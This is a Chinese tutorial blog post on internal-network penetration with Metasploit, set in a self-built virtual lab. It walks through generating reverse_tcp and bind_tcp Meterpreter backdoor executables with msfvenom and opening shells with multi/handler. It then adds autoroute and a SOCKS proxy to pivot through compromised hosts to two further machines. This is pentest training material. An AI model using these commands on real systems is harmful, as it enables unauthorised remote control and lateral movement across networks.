内网渗透——Metasploit的代理转发

目录

一、环境搭建

1.1 网络配置

1.2 开启文件共享功能

 二、MSF配置代理转发

        2.1 实现主机1上线

        2.2 实现主机2上线

        2.3 实现主机3上线 

一、环境搭建

1.1 网络配置

准备kali linux虚拟机*1

IP设置

 

vim /etc/network/interfaces


准备windows2008 R2虚拟机*3

主机1:

其他主机同理。

本次虚拟机环境没有防火墙限制,所以要提前关闭虚拟机的防火墙

1.2 开启文件共享功能

1)创建共享目录

mkdir /home/share

2) kali中开启文件共享需要下载samba

apt install samba

 3)修改samba配置文件

vi /etc/samba/smb.conf


文件末尾添加如下内容
[share]    #任意名字
comment = lv share   #任意名字
path = /home/share # 共享目录
;read only = no # 将共享目录设置为只读【前面加了;,表示这行被注释掉了】
writable = yes # 将共享目录设置为读写
browseable = yes # 显示共享目录下的所有文件
public = yes # 将共享目录设置为公共的
create mask = 0644 # 设置共享目录中的一般文件的默认权限
directory mask = 0755 # 设置共享目录中的目录文件的默认权限

4)启动samba

systemctl enable smb
systemctl enable nmb
systemctl restart smb
systemctl restart nmb

 5)查看是否启动成功【active(running)代表启动成功】

systemctl status smb
systemctl status nmb

注 :windows10/11 如果不是专业版企业版可能无法访问共享目录

注:win10/11有可能没有打开服务,导致无法访问共享

1)启动组策略

win+r运行输入以下内容

gpedit.msc

2)启用来宾登录

计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录

 二、MSF配置代理转发

        2.1 实现主机1上线

1)生成后门文件

reverse_tcp:反向链接时使用

lhost:kali 主机ip

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.108 lport=1111 -f exe >
/home/share/1111.exe

2)生成监听器

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1111
run

3)被攻击主机1运行生成的1111.exe文件

出现meterpreter就证明成功了,可以执行命令验证

ipconfig

 

 这样我们就实现了第一个主机上线的过程了。

        2.2 实现主机2上线

1)实现主机1上线

2)在已经上线的主机1上创建代理转发功能

        a).查看路由

run autoroute -p

显示 No routes have been added yet 说明没有路由

         b).添加路由

run post/multi/manage/autoroute

 出现这样的页面就说明添加路由成功了

3)挂起当前会话 

background

4)开启代理功能

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1122
run

5)测试代理功能是否可以工作

kali安装proxychains4

apt install proxychains4

修改配置文件

vim /etc/proxychains4.conf

修改之前设置好的端口1122

 6)在主机2上安装IIS

 7)使用proxychains4测试访问主机2上的IIS

proxychains4 nmap -Pn -sT -p80 10.10.10.2

STATE:open   说明可以访问IIS

 8)生成exe文件后门

bind_tcp:正向链接时使用

lhost: 0.0.0.0 指定主机2本机地址

msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=2222 -f exe >
/home/share/2222.exe

 9)生成监控器

background    #挂起会话
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.2
set lport 2222
run

10)主机2运行2222.exe

        2.3 实现主机3上线 

1)实现主机1、2上线

2)生成后门

msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=3333 -f exe >
/home/share/3333.exe

3)在主机2会话中创建路由

run post/multi/manage/autoroute

4)挂起会话

background

5)主机3正向链接

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 20.20.20.2
set lport 3333
run

 这样我们就实现了三台主机上线了。

  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值